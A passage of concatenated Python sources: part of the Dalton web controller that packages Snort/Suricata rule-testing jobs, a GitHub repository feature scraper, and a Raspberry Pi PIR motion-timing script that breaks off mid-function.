pcap_files = [{'filename': os.path.basename(combined_file), 'pcappath': combined_file}]
except Exception as e:
logger.error("Could not merge pcaps. Error: %s" % e)
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Could not merge pcaps. Error:", " %s" % e])
# get enable all rules option
bEnableAllRules = False
if request.form.get('optionProdRuleset') and request.form.get('optionEnableAllRules'):
bEnableAllRules = True
# get showFlobitAlerts option
bShowFlowbitAlerts = False
if request.form.get('optionProdRuleset') and request.form.get('optionShowFlowbitAlerts'):
bShowFlowbitAlerts = True
# get track performance option
bTrackPerformance = False
if request.form.get('optionPerf'):
bTrackPerformance = True
# get return engine statistics option
bGetEngineStats = False
try:
if request.form.get('optionStats'):
bGetEngineStats = True
except:
pass
# get generate fast pattern option
bGetFastPattern = False
try:
if request.form.get('optionFastPattern'):
bGetFastPattern = True
except:
pass
# A 'teapot' job is one that shouldn't be stored for a long period of time; it can be used by
# functionality that programatically analyzes a rule and/or other situations
# where the submission data shouldn't be stored for long periods of time (e.g. over an hour).
# 'teapot' is not an acronym. It's for job runs that are short and stout.
bteapotJob = False
# if teapotJob is set, set 'bteapotJob' to 'True'
try:
if request.form.get('teapotJob'):
bteapotJob = True
except:
pass
# used to tell the agent to return pcap data from alerts.
# This is only supported (for now) for agents that generage/process unified2 alerts
# and return pcap details from them.
bGetAlertDetailed = False
try:
if request.form.get('optionAlertDetailed'):
bGetAlertDetailed = True
except:
pass
# get other logs (only supported in Suricata for now)
bGetOtherLogs = False
try:
if request.form.get('optionOtherLogs'):
bGetOtherLogs = True
except:
pass
#get custom rules (if defined)
bCustomRules = False
custom_rules_file = os.path.join(TEMP_STORAGE_PATH, "%s_custom.rules" % job_id)
if request.form.get('optionCustomRuleset') and request.form.get('custom_ruleset'):
bCustomRules = True
custom_rules = request.form.get('custom_ruleset')
# strip out leading newlines and CRLFCRLF in case the sensor does not like it for some reason
custom_rules = custom_rules.lstrip('\x0A\x0D')
while re.search(r'\x0D\x0A\x0D\x0A', custom_rules):
custom_rules = custom_rules.replace('\x0D\x0A\x0D\x0A', '\x0D\x0A')
# used for automatically generating SID values for ad-hoc rules that don't include them
sid_base = 806421600
sid_offset = 1
# file we will write the custom rules to
fh = open(custom_rules_file, 'wb')
# check for rule errors (very simple right now)
for line in custom_rules.split('\n'):
# strip out trailing whitespace (note: this removes the newline chars too so have to add them back when we write to file)
line = line.rstrip()
# strip out leading whitespace to make subsequent matching easier (snort won't complain about leading whitespace though)
line = line.lstrip()
# if empty or comment line, continue
if line == '' or re.search(r'^\s+$', line) or line.startswith('#'):
continue
if (len(line) > 0) and not re.search(r'^[\x00-\x7F]+$', line):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule. Only ASCII characters are allowed in the literal representation of custom rules.", "Please encode necesary non-ASCII characters appropriately. Rule:", " %s" % line])
# some rule validation for Snort and Suricata
if sensor_tech.startswith('snort') or sensor_tech.startswith('suri'):
# rule must start with alert|log|pass|activate|dynamic|drop|reject|sdrop
if not re.search(r'^(alert|log|pass|activate|dynamic|drop|reject|sdrop|event_filter|threshold|suppress|rate_filter|detection_filter)\s', line):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule, action (first word in rule) of \'%s\' not supported. Rule:" % line.split()[0], "%s" % line])
# rule must end in closing parenthesis
if not line.endswith(')') and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule; does not end with closing parenthesis. Rule:", "%s" % line])
# last keyword in the rule must be terminated by a semicolon
if not line[:-1].rstrip().endswith(';') and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule, last rule option must end with semicolon. Rule:", "%s" % line])
# add sid if not included
if not re.search(r'(\s|\x3B)sid\s*\:\s*\d+\s*\x3B', line) and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
# if no sid in rule, fix automatically instead of throwing an error
#return render_template('/dalton/error.html', jid='', msg=["\'sid\' not specified in rule, this will error. Rule:", "%s" % line])
line = re.sub(r'\x29$', " sid:%d;)" % (sid_base + sid_offset), line)
sid_offset += 1
# including newline because it was removed earlier with rstrip()
fh.write("%s\n" % line)
fh.close()
if not sensor_tech:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid="<not_defined>", msg=["Variable \'sensor_tech\' not specified. Please reload the submission page and try again."])
# get 'Override External_NET - set to any' option
bOverrideExternalNet = False
try:
if request.form.get('overrideExternalNet'):
bOverrideExternalNet = True
except:
pass
# get and write variables
vars = request.form.get('custom_vars')
if not vars:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["No variables defined."])
# pre-set IP vars to add to the config if they don't exist.
# this helps with some rulesets that may use these variables
# but the variables aren't in the default config.
ipv2add = {'RFC1918': "[10.0.0.0/8,192.168.0.0/16,172.16.0.0/12]"
}
conf_file = request.form.get('custom_engineconf')
if not conf_file:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["No configuration file provided."])
if sensor_tech.startswith('suri'):
#yaml-punch!
# combine engine conf and variables
# set to NULL so no attempt to include it will happen later
vars_file = None
# just in case someone edited and didn't quote a boolean
conf_file = re.sub(r'(\w):\x20+(yes|no)([\x20\x0D\x0A\x23])', '\g<1>: "\g<2>"\g<3>', conf_file)
try:
# read in yaml
config = yaml.round_trip_load(conf_file, version=(1,1), preserve_quotes=True)
# add in vars
vars_config = yaml.safe_load(vars, version=(1,1))
# add some IP vars common to some rulesets
try:
for v in ipv2add:
if v not in vars_config['vars']['address-groups']:
vars_config['vars']['address-groups'][v] = ipv2add[v]
except Exception as e:
logger.warn("(Not Fatal) Problem customizing Suricata variables; your YAML may be bad. %s" % e)
logger.debug("%s" % traceback.format_exc())
# set EXTERNAL_NET to 'any' if option set
try:
if bOverrideExternalNet:
if not 'EXTERNAL_NET' in vars_config['vars']['address-groups']:
logger.warn("EXTERNAL_NET IP variable not set in config; setting to 'any'")
vars_config['vars']['address-groups']['EXTERNAL_NET'] = 'any'
logger.debug("Set 'EXTERNAL_NET' IP variable to 'any'")
except Exception as e:
logger.warn("(Not Fatal) Problem ovverriding EXTERNAL_NET: %s" % e)
logger.debug("%s" % traceback.format_exc())
config.update(vars_config)
# first, do rule includes
# should references to other rule files be removed?
removeOtherRuleFiles = True
if not 'rule-files' in config or removeOtherRuleFiles:
config['rule-files'] = []
if request.form.get('optionProdRuleset'):
# some code re-use here
prod_ruleset_name = os.path.basename(request.form.get('prod_ruleset'))
if not prod_ruleset_name.endswith(".rules"):
prod_ruleset_name = "%s.rules" % prod_ruleset_name
config['rule-files'].append("%s" % prod_ruleset_name)
if bCustomRules:
config['rule-files'].append("dalton-custom.rules")
# remove default rule path; added back on agent
if 'default-rule-path' in config:
config.pop('default-rule-path', None)
# set outputs
if 'outputs' not in config:
logger.warn("No 'outputs' seciton in Suricata YAML. This may be a problem....")
# going to try to build this from scratch but Suri still may not like it
config['outputs'] = []
# apparently with this version of ruamel.yaml and the round trip load, outputs isn't
# and ordered dict but a list...
olist =[config['outputs'][i].keys()[0] for i in range(0, len(config['outputs']))]
# fast.log
fast_config = {'fast': {'enabled': True, \
'filename': "dalton-fast.log", \
'append': True}}
if 'fast' in olist:
config['outputs'][olist.index('fast')] = fast_config
else:
config['outputs'].append(fast_config)
# unified2 logging
deployment = "reverse"
header = "X-Forwarded-For"
if 'unified2-alert' in olist:
try:
deployment = config['outputs'][olist.index('unified2-alert')]['unified2-alert']['xff']['deployment']
except Exception as e:
logger.debug("Could not get outputs->unified2-alert->xff->deployment. Using default value of '%s'" % deployment)
try:
header = config['outputs'][olist.index('unified2-alert')]['unified2-alert']['xff']['header']
except Exception as e:
logger.debug("Could not get outputs->unified2-alert->xff->header. Using default value of '%s'" % header)
u2_config = {'unified2-alert': {'enabled': True, \
'filename': "unified2.dalton.alert", \
'xff': {'enabled': True, 'mode': 'extra-data', \
'deployment': deployment, 'header': header}}}
if 'unified2-alert' in olist:
config['outputs'][olist.index('unified2-alert')] = u2_config
else:
config['outputs'].append(u2_config)
#stats
stats_config = {'stats': {'enabled': True, \
'filename': "dalton-stats.log", \
'totals': True, \
'threads': False}}
if 'stats' in olist:
config['outputs'][olist.index('stats')] = stats_config
else:
config['outputs'].append(stats_config)
if not "profiling" in config:
config['profiling'] = {}
# always return Engine stats for Suri
config['profiling']['packets'] = {'enabled': True, \
'filename': "dalton-packet_stats.log", \
'append': True}
if bGetOtherLogs:
# alert-debug
alert_debug_config = {'alert-debug': {'enabled': True, \
'filename': "dalton-alert_debug.log", \
'append': True}}
if 'alert-debug' in olist:
config['outputs'][olist.index('alert-debug')] = alert_debug_config
else:
config['outputs'].append(alert_debug_config)
# http
http_config = {'http-log': {'enabled': True, \
'filename': "dalton-http.log", \
'append': True}}
if 'http-log' in olist:
config['outputs'][olist.index('http-log')] = http_config
else:
config['outputs'].append(http_config)
# tls
tls_config = {'tls-log': {'enabled': True, \
'filename': "dalton-tls.log", \
'append': True}}
if 'tls-log' in olist:
config['outputs'][olist.index('tls-log')] = tls_config
else:
config['outputs'].append(tls_config)
# dns
dns_config = {'dns-log': {'enabled': True, \
'filename': "dalton-dns.log", \
'append': True}}
if 'dns-log' in olist:
config['outputs'][olist.index('dns-log')] = dns_config
else:
config['outputs'].append(dns_config)
# Don't try to enable eve-log since it is unformatted and redundant in many cases.
# But in case it is enabled, set the filename and disable EVE tls since you
# can't have tls log to file AND be included in the EVE log.
try:
# set filename
config['outputs'][olist.index('eve-log')]['eve-log']['filename'] = "dalton-eve.json"
# disable EVE TLS logging. This mixing of dicts and lists is onerous....
# Update: apparently in Suri 4 and >= 3.1 you CAN have multiple tls loggers....
# doing this one at a time (two passes) since we are iterating over the structure
# we want to edit AND we are using list indexes.
# Also, the yaml will be represented differently based on the values (e.g. string vs ordered dict).
# Instead of trying to check everything every time, just catch the exception(s) and move on. The
# stuff we want disabled will still get disabled despite the exceptions along the way.
for i in range(0,len(config['outputs'][olist.index('eve-log')]['eve-log']['types'])):
try:
if config['outputs'][olist.index('eve-log')]['eve-log']['types'][i].keys()[0] == 'alert':
# apparently this is supported -- http://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html
config['outputs'][olist.index('eve-log')]['eve-log']['types'][i]['alert'].pop('tls', None)
logger.debug("Removed outputs->eve-log->types->alert->tls")
break
except Exception as e:
#logger.debug("Possible issue when removing outputs->eve-log->types->alert->tls (EVE TLS log). Error: %s" % e)
pass
for i in range(0,len(config['outputs'][olist.index('eve-log')]['eve-log']['types'])):
try:
if config['outputs'][olist.index('eve-log')]['eve-log']['types'][i].keys()[0] == 'tls':
del config['outputs'][olist.index('eve-log')]['eve-log']['types'][i]
logger.debug("Removed outputs->eve-log->types->tls")
break
except Exception as e:
#logger.debug("Possible issue when removing outputs->eve-log->types->tls (EVE TLS log). Error: %s" % e)
pass
except Exception as e:
logger.debug("Problem editing eve-log section of config: %s" % e)
pass
# set filename for rule and keyword profiling
if bTrackPerformance:
# rule profiling
if not "rules" in config['profiling']:
config['profiling']['rules'] = {'enabled': True, \
'filename': "dalton-rule_perf.log", \
'append': True, \
'sort': "avgticks", \
'limit': 1000, \
'json': False}
else:
config['profiling']['rules']['enabled'] = True
config['profiling']['rules']['filename'] = "dalton-rule_perf.log"
config['profiling']['rules']['json'] = False
# keyword profiling
# is this supported by older Suri versions? If not Suri will ignore when loading YAML
if 'keywords' in config['profiling']:
config['profiling']['keywords'] = {'enabled': True, \
'filename': "dalton-keyword_perf.log", \
'append': True}
# write out
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_suricata.yaml" % job_id)
engine_conf_fh = open(engine_conf_file, "wb")
engine_conf_fh.write(yaml.round_trip_dump(config, version=(1,1), explicit_start=True))
engine_conf_fh.close()
except Exception as e:
logger.error("Problem processing YAML file(s): %s" % e)
logger.debug("%s" % traceback.format_exc())
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Error processing YAML file(s):", "%s" % e])
else:
engine_conf_file = None
vars_file = os.path.join(TEMP_STORAGE_PATH, "%s_variables.conf" % job_id)
vars_fh = open(vars_file, "wb")
if sensor_tech.startswith('snort'):
# check variables
for line in vars.split('\n'):
# strip out leading and trailing whitespace (note: this removes the newline chars too so have to add them back when we write to file)
line = line.strip()
# if empty or comment line, continue
if line == '' or line.startswith('#'):
continue
if not re.search(r'^(var|portvar|ipvar)\s', line):
vars_fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid variable definition. Must be 'var', 'portvar', or 'ipvar':", "%s" % line])
if bOverrideExternalNet:
if line.startswith("ipvar EXTERNAL_NET "):
line = "ipvar EXTERNAL_NET any"
logger.debug("Set 'EXTERNAL_NET' ipvar to 'any'")
if line.startswith("var EXTERNAL_NET "):
line = "var EXTERNAL_NET any"
logger.debug("Set 'EXTERNAL_NET' var to 'any'")
vars_fh.write("%s\n" % line)
# add 'ipvar EXTERNAL_NET any' if not present and Override EXTERNAL_NET option set
if bOverrideExternalNet and not "\nipvar EXTERNAL_NET " in vars and not vars.startswith("ipvar EXTERNAL_NET ") and not "\nvar EXTERNAL_NET " in vars and not vars.startswith("var EXTERNAL_NET "):
logger.warn("No EXTERNAL_NET variable found in Snort config, adding 'ipvar EXTERNAL_NET any'")
vars_fh.write("ipvar EXTERNAL_NET any\n")
# add some IP vars common to some rulesets
try:
for v in ipv2add:
if not "\nipvar %s " % v in vars and not vars.startswith("ipvar %s " % v):
vars_fh.write("ipvar %s %s\n" % (v, ipv2add[v]))
except Exception as e:
logger.warn("(Not Fatal) Problem customizing Snort variables: %s" % e)
logger.debug("%s" % traceback.format_exc())
# tweak Snort conf file
if bTrackPerformance:
new_conf = ''
perf_found = False
# splitlines without 'True' arg removes ending newline char(s)
lines = iter(conf_file.splitlines())
while True:
try:
line = next(lines)
# might as well strip out comments
if line.lstrip(' ').startswith('#') or line.lstrip(' ').rstrip(' ') == '': continue
if line.startswith("config profile_rules:"):
perf_found = True
while line.endswith("\\"):
line = line.rstrip('\\') + next(lines)
if "filename " in line:
line = re.sub(r'filename\s+[^\s\x2C]+', 'filename dalton-rule_perf.log', line)
else:
line += ", filename dalton-rule_perf.log append"
new_conf += "%s\n" % line
except StopIteration:
break
if not perf_found:
new_conf += "\nconfig profile_rules: print 1000, sort avg_ticks, filename dalton-rule_perf.log append"
conf_file = new_conf
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_snort.conf" % job_id)
else:
vars_fh.write(vars)
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_engine.conf" % job_id)
vars_fh.close()
engine_conf_fh = open(engine_conf_file, "wb")
engine_conf_fh.write(conf_file)
engine_conf_fh.close()
# create jid (job identifier) value
digest = hashlib.md5()
digest.update(job_id)
digest.update(sensor_tech)
jid = digest.hexdigest()[0:16]
#Create the job zipfile. This will contain the file 'manifest.json', which is also queued.
#And place the rules file, variables file, and test PCAPs within the zip file
if not os.path.exists(JOB_STORAGE_PATH):
os.makedirs(JOB_STORAGE_PATH)
zf_path = None
if bteapotJob:
# add 'teapot_' to the beginning of the jid to distinguish teapot jobs. Among other things, this
# makes it so cron or whatever can easily delete teapot jobs on a different schedule if need be.
jid = 'teapot_%s' % jid
zf_path = '%s/%s.zip' % (JOB_STORAGE_PATH, jid)
zf = zipfile.ZipFile(zf_path, mode='w')
try:
for pcap in pcap_files:
zf.write(pcap['pcappath'], arcname=os.path.basename(pcap['filename']))
if request.form.get('optionProdRuleset'):
ruleset_path = request.form.get('prod_ruleset')
if not ruleset_path:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["No defined ruleset provided."])
if not prod_ruleset_name: # if Suri job, this is already set above
prod_ruleset_name = os.path.basename(ruleset_path)
if not prod_ruleset_name.endswith(".rules"):
prod_ruleset_name = "%s.rules" % prod_ruleset_name
logger.debug("ruleset_path = %s" % ruleset_path)
logger.debug("Dalton in page_coverage_summary(): prod_ruleset_name: %s" % (prod_ruleset_name))
if not ruleset_path.startswith(RULESET_STORAGE_PATH) or ".." in ruleset_path or not re.search(r'^[a-z0-9\/\_\-\.]+$', ruleset_path, re.IGNORECASE):
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["Invalid ruleset submitted: '%s'." % prod_ruleset_name, "Path/name invalid."])
elif not os.path.exists(ruleset_path):
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["Ruleset does not exist on Dalton Controller: %s; ruleset-path: %s" % (prod_ruleset_name, ruleset_path)])
else:
# if these options are set, modify ruleset accordingly
if bEnableAllRules or bShowFlowbitAlerts:
modified_rules_path = "%s/%s_prod_modified.rules" % (TEMP_STORAGE_PATH, job_id)
regex = re.compile(r"^#+\s*(alert|log|pass|activate|dynamic|drop|reject|sdrop)\s")
prod_rules_fh = open(ruleset_path, 'rb')
modified_rules_fh = open(modified_rules_path, 'wb')
for line in prod_rules_fh:
# if Enable disabled rules checked, do the needful
if bEnableAllRules:
if regex.search(line):
line = line.lstrip('# \t')
# if show all flowbit alerts set, strip out 'flowbits:noalert;'
if bShowFlowbitAlerts:
line = re.sub(r'([\x3B\s])flowbits\s*\x3A\s*noalert\s*\x3B', '\g<1>', line)
modified_rules_fh.write(line)
prod_rules_fh.close()
modified_rules_fh.close()
ruleset_path = modified_rules_path
zf.write(ruleset_path, arcname=prod_ruleset_name)
try:
if request.form.get('optionCustomRuleset') and request.form.get('custom_ruleset'):
zf.write(custom_rules_file, arcname='dalton-custom.rules')
except:
logger.warn("Problem adding custom rules: %s" % e)
pass
if vars_file:
zf.write(vars_file, arcname='variables.conf')
if engine_conf_file:
zf.write(engine_conf_file, arcname=os.path.basename(engine_conf_file))
#build the json job
json_job = {}
json_job['id'] = jid
json_job['pcaps']= []
for pcap in pcap_files:
json_job['pcaps'].append(os.path.basename(pcap['filename']))
json_job['user'] = user
json_job['enable-all-rules'] = bEnableAllRules
json_job['show-flowbit-alerts'] = bShowFlowbitAlerts
json_job['custom-rules'] = bCustomRules
json_job['track-performance'] = bTrackPerformance
json_job['get-engine-stats'] = bGetEngineStats
json_job['teapot-job'] = bteapotJob
json_job['alert-detailed'] = bGetAlertDetailed
json_job['get-fast-pattern'] = bGetFastPattern
json_job['get-other-logs'] = bGetOtherLogs
json_job['sensor-tech'] = sensor_tech
json_job['prod-ruleset'] = prod_ruleset_name
json_job['engine-conf'] = os.path.basename(engine_conf_file)
# add var and other fields too
str_job = json.dumps(json_job)
#build the manifest file
manifest_path = '%s/%s.json' % (TEMP_STORAGE_PATH, job_id)
f = open(manifest_path, 'w')
f.write(str_job)
f.close()
zf.write(manifest_path, arcname='manifest.json')
finally:
zf.close()
logger.debug("Dalton in page_coverage_summary(): created job zip file %s for user %s" % (zf_path, user))
#remove the temp files from local storage now that everything has been written to the zip file
delete_temp_files(job_id)
# Note: any redis sets here are not given expire times; these should
# be set when job is requested by agent
#store user name
r.set("%s-user" % jid, user)
#store sensor tech for job
r.set("%s-tech" % jid, sensor_tech)
# store submission time for job
r.set("%s-submission_time" % jid, datetime.datetime.now().strftime("%b %d %H:%M:%S"))
# if this is a teapot job,
if bteapotJob:
r.set("%s-teapotjob" % jid, bteapotJob)
# set job as queued and write to the Redis queue
set_job_status(jid, STAT_CODE_QUEUED)
set_job_status_msg(jid, "Queued")
logger.info("Dalton user '%s' submitted Job %s to queue %s" % (user, jid, sensor_tech))
r.rpush(sensor_tech, str_job)
# add to list for queue web page
r.lpush("recent_jobs", jid)
if bteapotJob:
return jid
else:
return redirect('/dalton/job/%s' % jid)
@dalton_blueprint.route('/dalton/queue')
#@login_required()
def page_queue_default():
"""the default queue page"""
global r
num_jobs_to_show_default = 25
# clear old job files from disk
# spin off a thread in case deleting files from
# disk takes a while; this way we won't block the
# queue page from loading
Thread(target=delete_old_job_files).start()
try:
num_jobs_to_show = int(request.args['numjobs'])
except:
num_jobs_to_show = num_jobs_to_show_default
if not num_jobs_to_show or num_jobs_to_show < 0:
num_jobs_to_show = num_jobs_to_show_default
# use a list of dictionaries instead of a dict of dicts to preserve order when it gets passed to render_template
queue = []
queued_jobs = 0;
running_jobs = 0;
if r.exists('recent_jobs') and r.llen('recent_jobs') > 0:
# get the last num_jobs_to_show jobs; can adjust if you want (default set above in exception handler)
count = 0
jobs = r.lrange("recent_jobs", 0, -1)
for jid in jobs:
# iterate thru all jobs and get total number of queued and running but only return
# the most recent num_jobs_to_show jobs
# do some cleanup on the list to remove jobs where the data has expired (been deleted).
# Using 'jid-submission_time' and jid=status as tests -- if these don't exist the other keys associated
# with that jid should be exipred or will expire shortly. That key gets set to expire
# after a job is requested/sent to a sensor so we won't clear out queued jobs.
if not r.exists("%s-submission_time" % jid) or not r.exists("%s-status" % jid):
# job has expired
logger.debug("Dalton in page_queue_default(): removing job: %s" % jid)
r.lrem("recent_jobs", jid)
# just in case, expire all keys associated with jid
expire_all_keys(jid)
else:
status = int(get_job_status(jid))
# ^^ have to cast as an int since it gets stored as a string (everything in redis is a string apparently....)
#logger.debug("Dalton in page_queue_default(): Job %s, stat code: %d" % (jid, status))
status_msg = "Unknown"
if status == STAT_CODE_QUEUED:
status_msg = "Queued"
queued_jobs += 1
elif status == STAT_CODE_RUNNING:
if check_for_timeout(jid):
status_msg = "Timeout"
else:
running_jobs += 1
status_msg = "Running"
if count < num_jobs_to_show:
if status == STAT_CODE_DONE:
status_msg = "Complete"
if r.get("%s-error" % jid):
status_msg += " (Error)"
else:
status_msg += " (Success)"
elif status == STAT_CODE_INTERRUPTED:
status_msg = "Interrupted"
elif status == STAT_CODE_TIMEOUT:
status_msg = "Timeout"
# Note: could add logic to not show teapot jobs?; add if teapotjob: job['teapot'] = "True" else: "False"
job = {}
job['jid'] = jid
job ['tech'] = "%s" % r.get("%s-tech" % jid)
job['time'] = "%s" % r.get("%s-submission_time" % jid)
job['user'] = "%s" % r.get("%s-user" % jid)
job['status'] = status_msg
queue.append(job)
count += 1
return render_template('/dalton/queue.html', queue=queue, queued_jobs=queued_jobs, running_jobs=running_jobs, num_jobs=num_jobs_to_show)
@dalton_blueprint.route('/dalton/about')
#@login_required()
def page_about_default():
"""the about/help page"""
return render_template('/dalton/about.html', page='')
#########################################
# API handling code (some of it)
#########################################
@dalton_blueprint.route('/dalton/controller_api/v2/<jid>/<requested_data>', methods=['GET'])
#@auth_required()
def controller_api_get_request(jid, requested_data):
global r
# add to as necessary
valid_keys = ('alert', 'alert_detailed', 'ids', 'other_logs', 'perf', 'tech', 'error', 'time', 'statcode', 'debug', 'status', 'submission_time', 'start_time', 'user', 'all')
json_response = {'error':False, 'error_msg':None, 'data':None}
# some input validation
if not validate_jobid(jid):
json_response["error"] = True
json_response["error_msg"] = "Invalid Job ID value: %s" % jid
elif not re.match(r'^[a-zA-Z\d\_\.\-]+$', requested_data):
json_response["error"] = True
json_response["error_msg"] = "Invalid request for data: %s" % requested_data
else:
try:
status = get_job_status(jid)
except:
status = None
if not status:
# job doesn't exist
# expire (delete) all keys related to the job just in case to prevent memory leaks
expire_all_keys(jid)
json_response["error"] = True
json_response["error_msg"] = "Job ID %s does not exist" % jid
else:
# inspect the requested_data value and return the needful :)
# check 'valid_keys'
if requested_data not in valid_keys:
json_response["error"] = True
json_response["error_msg"] = "value '%s' invalid" % requested_data
else:
ret_data = None
if requested_data == 'all':
# 'all' returns a dict of all data (other values just return a string)
ret_data = {}
try:
for key in valid_keys:
if key == 'all':
continue
else:
ret_data[key] = r.get("%s-%s" % (jid, key))
except:
json_response["error"] = True
json_response["error_msg"] = "Unexpected error: cannot pull '%s' data for Job ID %s" % (requested_data, jid)
else:
try:
ret_data = r.get("%s-%s" % (jid, requested_data))
except:
json_response["error"] = True
json_response["error_msg"] = "Unexpected error: cannot pull '%s' for jobid %s," % (requested_data, jid)
json_response["data"] = "%s" % ret_data
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
#print "raw response: %s" % json_response
@dalton_blueprint.route('/dalton/controller_api/get-current-sensors/<engine>', methods=['GET'])
def controller_api_get_current_sensors(engine):
"""Returns a list of current active sensors"""
global r, supported_engines
sensors = []
if engine is None or engine == '' or engine not in supported_engines:
return Response("Invalid 'engine' supplied. Must be one of %s.\nExample URI:\n\n/dalton/controller_api/get-current-sensors/suricata" % supported_engines,
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# first, clean out old sensors
clear_old_agents()
# get active sensors based on engine
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
t = r.get("%s-tech" % sensor)
if t.lower().startswith(engine.lower()):
sensors.append(t)
# sort so highest version number is first
try:
sensors.sort(key=LooseVersion, reverse=True)
except Exception as e:
sensors.sort(reverse=True)
# return json
json_response = {'sensor_tech': sensors}
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/get-current-sensors-json-full', methods=['GET'])
def controller_api_get_current_sensors_json_full():
"""Returns json with details about all the current active sensors"""
sensors = page_sensor_default(return_dict = True)
return Response(json.dumps(sensors), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/get-max-pcap-files', methods=['GET'])
def controller_api_get_max_pcap_files():
"""Returns the config value of max_pcap_files (the number of
pcap or compressed that can be uploaded per job).
This could be useful for programmatic submissions where the
submitter can ensure all the files will be processed.
"""
return str(MAX_PCAP_FILES)
|
update_features.py
|
import Queue
import threading
from tqdm import tqdm
import pandas as pd
import requests
from app.utils import website_exists
def update_df(path="data/processed_data.csv"):
THREADS_COUNT = 5
data_frame = pd.DataFrame.from_csv(path)
bar = tqdm(total=len(data_frame))
df_q = Queue.LifoQueue()
df_q.put(data_frame)
token_q = Queue.LifoQueue()
for i in range(THREADS_COUNT):
token_q.put(i)
threads = []
for index, row in data_frame.iterrows():
t = threading.Thread(target=update_features, args=(index, row, bar, df_q, token_q))
t.daemon = True
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
df_q.get().to_csv(path)
def update_features(index, row, bar, df_q, token_q):
"""Define which features should be updated here. Preferably without using the Github API since we have no token renewal, yet."""
owner = row['owner']
name = row['name']
token = token_q.get()
try:
new_data_frame = pd.DataFrame.from_dict(row).T
is_owner_homepage = name.lower() == "{}.github.io".format(owner.lower()) or name.lower() == "{}.github.com".format(owner.lower())
has_homepage = website_exists("http://{}.github.io/{}".format(owner, name))
has_license = "octicon octicon-law" in requests.get("https://github.com/{}/{}".format(owner, name)).text
has_travis_config = website_exists("https://github.com/{}/{}/blob/master/.travis.yml".format(owner, name), only_headers=True)
has_circle_config = website_exists("https://github.com/{}/{}/blob/master/circle.yml".format(owner, name), only_headers=True)
has_ci_config = has_travis_config or has_circle_config
new_data_frame.set_value(index, "isOwnerHomepage", is_owner_homepage)
new_data_frame.set_value(index, "hasHomepage", has_homepage)
new_data_frame.set_value(index, "hasLicense", has_license)
new_data_frame.set_value(index, "hasTravisConfig", has_travis_config)
new_data_frame.set_value(index, "hasCircleConfig", has_circle_config)
new_data_frame.set_value(index, "hasCiConfig", has_ci_config)
except Exception, e:
print "Exception in aggregate_features: " + str(e)
token_q.put(token)
return
token_q.put(token)
shared_data_frame = df_q.get()
update_columns = [col for col in ["isOwnerHomepage", "hasHomepage", "hasLicense", "hasTravisConfig", "hasCircleConfig", "hasCiConfig"]]
for col in update_columns:
try:
shared_data_frame.set_value(index, col, new_data_frame.loc[index, col])
except Exception, e:
print "An error occured while fetching {}/{} and setting {}: {}".format(owner, name, col, e)
df_q.put(shared_data_frame)
bar.update()
if __name__ == '__main__':
update_df()
|
measure motion time with PIR.py
|
# Import standard python modules
import time
import datetime
import sys
import threading
# Import GPIO Module
import RPi.GPIO as GPIO
# Control of sincronization in Threads
lock = threading.RLock()
# Setup Sensor pin var
SENSOR_PIN = 5
# Setup var controls
showDataTime=5
# Define class for instance objects in threading
class MeasureData():
def __init__(self):
self.measureTime=0
self.isMovement=False
# Define functions for paralelism
def showData(motionMeasure):
counted=False
while True:
# show data every 20 seconds and reset countTimes
if(int(time.time())%showDataTime==0):
if(not counted):
lock.acquire()
print("{} | Tiempo de movimiento detectado {}".format(
datetime.datetime.now(), motionMeasure.measureTime))
motionMeasure.measureTime=0
lock.release()
counted=True
else:
counted=False
# object instance for global data in events (is handle with events)
totalMotionTime=MeasureData()
# Setup Threading, to show data every 20 seconds
hilo0=threading.Thread(target=showData, args=[totalMotionTime,])
hilo0.start()
# Define callback functions which will be called when certain events happen.
def motionPIR(channel):
# motionPIR function will be called when event
# RISING and FALLING is detected (GPIO event)
# In retriggering mode (jumper placed in H)
# The event detection can works of the next form:
# with RISING event (LOW to HIGH) while detect movement
# with FALLING event (HIGH to LOW) when movement are
# stoped (some seconds, depend sensivity value)
timestamp = time.time()
stamp = datetime.datetime.fromtimestamp(timestamp).strftime('%H:%M:%S')
sense=GPIO.input(SENSOR_PIN)
if(sense==GPIO.HIGH):
# print('Se ha detectado movimiento: {}'.format(stamp))
totalMotionTime.isMovement=True
elif(sense==GPIO.LOW):
# print('No hay mas movimiento: {}'.format(stamp))
totalMotionTime.isMovement=False
# Define Function "main", way to manage errors
def main():
# Setup GPIO mode
GPIO.setmode(GPIO.BCM)
# Set GPIO pin direction
GPIO.setup(SENSOR_PIN, GPIO.IN)
# add event for detection
